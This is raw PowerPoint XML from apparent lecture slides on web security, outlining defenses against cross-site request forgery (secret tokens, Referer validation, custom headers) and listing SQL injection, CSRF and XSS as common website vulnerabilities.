          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> Validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Custom HTTP Header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86020" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5318125" y="6145213"/>
            <a:ext cx="184150" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="2438400"/>
            <a:ext cx="4133850" cy="457200"/>
            <a:chOff x="2832" y="1008"/>
            <a:chExt cx="2604" cy="288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86032" name="Rectangle 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="1008"/>
              <a:ext cx="2544" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86033" name="Text Box 6"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="1035"/>
              <a:ext cx="2604" cy="213"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>&lt;input type=hidden value=23a3af01b&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 12"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="4038600"/>
            <a:ext cx="4953000" cy="457200"/>
            <a:chOff x="2832" y="2050"/>
            <a:chExt cx="2986" cy="288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86030" name="Rectangle 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="2050"/>
              <a:ext cx="2880" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86031" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="2078"/>
              <a:ext cx="2986" cy="212"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>Referer: http://www.facebook.com/home.php</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 14"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="5867400"/>
            <a:ext cx="3568700" cy="457200"/>
            <a:chOff x="2832" y="3051"/>
            <a:chExt cx="2248" cy="288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86028" name="Rectangle 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="3051"/>
              <a:ext cx="2208" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86029" name="Text Box 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="3078"/>
              <a:ext cx="2248" cy="213"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>X-Requested-By: XMLHttpRequest</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="86024" name="Picture 15"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="2286000"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="86025" name="Picture 16"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="3943350"/>
            <a:ext cx="1524000" cy="721895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="86026" name="Picture 17"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="5613400"/>
            <a:ext cx="1028700" cy="939800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="86027" name="Picture 18"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2552700" y="2247900"/>
            <a:ext cx="800100" cy="952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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="274638"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Secret Token Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87043" name="Content Placeholder 4" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Requests include a hard-to-guess secret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Unguessability substitutes for unforgeability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Variations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Session identifier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Session-independent token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Session-dependent token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>HMAC of session identifier</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="87044" name="Picture 15"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="503238"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="87045" name="Picture 18"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7543800" y="465138"/>
            <a:ext cx="800100" cy="9525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Secret Token Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="88067" name="Content Placeholder 4" descr="Picture 13.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="-9982" r="-9982"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1495425"/>
            <a:ext cx="8458200" cy="5057775"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="5872163"/>
            <a:ext cx="8253413" cy="681037"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="38100" dir="2700000" algn="br" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="42999"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Oval 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="5991225"/>
            <a:ext cx="4078288" cy="47942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anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>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533400" y="1524000"/>
            <a:ext cx="114300" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10243" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Three top </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>vulnerabilites</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10244"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SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser sends malicious input to server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad input checking leads to malicious SQL query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSRF – Cross-site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad web site sends browser request to good web site, using credentials of an innocent victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS – Cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bad web site sends innocent victim a script that steals information from an honest web site</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Referer Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5122" name="Object 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1066800" y="1828800"/>
          <a:ext cx="7285038" cy="3276600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s480268" name="Image" r:id="rId3" imgW="8076190" imgH="3631746" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Image" r:id="rId3" imgW="8076190" imgH="3631746"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728503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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5318125" y="6145213"/>
            <a:ext cx="184150" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Validation Defense</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89091" name="Content Placeholder 4" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: http://www.facebook.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: http://www.attacker.com/evil.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lenient </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Doesn't work if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is missing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Strict </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>validaton</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Secure, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is sometimes absent…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89092" name="Rectangle 20"/>
          <p:cNvSpPr>
